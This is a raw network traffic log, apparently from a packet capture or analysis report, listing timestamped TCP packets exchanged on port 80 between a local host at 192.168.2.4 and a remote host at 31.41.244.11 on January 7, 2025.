Jan 7, 2025 10:09:03.536799908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.536802053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.536813021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.536823988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.536824942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.536853075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.536853075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.536880970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.536880970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.536899090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.536911964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.536923885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.536935091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.536957979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.536987066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.537036896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537050009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537066936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537080050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537091970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537103891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537107944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.537115097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.537117958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537132025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537147999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.537195921 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.537247896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537261009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537280083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537290096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.537312984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.537312984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.537329912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564181089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564202070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564213991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564260960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564274073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564286947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564287901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564287901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564318895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564331055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564331055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564332008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564358950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564372063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564380884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564380884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564388037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564398050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564419985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564448118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564486980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564498901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564515114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564524889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.564542055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.564559937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.567054033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.567065954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.567078114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.567111015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.567121983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.567128897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.567142963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.567154884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.567167044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.567173004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.567226887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.567226887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.589109898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.589122057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.589133978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.589159012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.589169979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.589193106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.589229107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.589252949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.589267969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.589278936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.589291096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.589332104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.589332104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.589353085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.621815920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.621829987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.621843100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.621900082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.621901989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.621915102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.621927023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.621927023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.621942043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.621949911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.621953964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.621965885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.621973038 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.621999979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622013092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622013092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622018099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622047901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622082949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622086048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622102976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622114897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622131109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622145891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622154951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622154951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622158051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622181892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622193098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622200012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622205973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622210979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622256994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622256994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622256994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622293949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622304916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622308016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622323036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622325897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622333050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622364998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622364998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622400045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622411013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622421980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622433901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622443914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622462034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622478008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622478008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622531891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622539997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622551918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622564077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622581959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622594118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622596979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622603893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622617006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622618914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622654915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622690916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622744083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622760057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622778893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622791052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622796059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622803926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622827053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622862101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622879982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622890949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622903109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622915983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.622963905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.622984886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623044014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623045921 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623055935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623066902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623078108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623085976 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623090982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623101950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623112917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623115063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623127937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623131990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623159885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623168945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623178959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623189926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623193026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623203039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623214960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623224020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623224020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623265028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623328924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623346090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623358011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623369932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623380899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623392105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623403072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623409986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623420000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623428106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623450041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623470068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623483896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623549938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623620033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623632908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623644114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623656988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623667955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623680115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623681068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623698950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623712063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623714924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623714924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623768091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623768091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.623979092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.623991013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.624001026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.624012947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.624023914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.624034882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.624043941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.624047041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.624058962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.624062061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.624073029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.624074936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.624088049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.624095917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.624099970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.624145985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.624145985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.651232958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651246071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651257038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651268005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651293039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651324987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651338100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.651338100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.651340008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651354074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651374102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651385069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651390076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.651390076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.651397943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651422024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.651423931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651438951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651449919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.651452065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.651473045 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.651510954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.653855085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.653891087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.653901100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.653918028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.653923988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.653932095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.653938055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.653951883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.653980017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.653984070 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.654011011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.654035091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.676069975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.676090002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.676103115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.676115990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.676146030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.676146030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.676179886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.676187992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.676207066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.676218987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.676238060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.676317930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.708796978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.708853006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.708872080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.708883047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.708918095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.708997965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709022999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709036112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709050894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709065914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709069967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709079027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709103107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709140062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709142923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709152937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709157944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709163904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709173918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709184885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709192038 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709198952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709218979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709219933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709232092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709249973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709260941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709271908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709273100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709273100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709285975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709307909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709307909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709315062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709326982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709338903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709341049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709352016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709361076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709381104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709389925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709398031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709403038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709417105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709429979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709439039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709439039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709455013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709466934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709477901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709479094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709489107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709492922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709510088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709528923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709528923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709546089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.709566116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.709636927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711432934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711443901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711462975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711481094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711492062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711503029 CET	80	50017	31.41.244.11	192.168.2.4
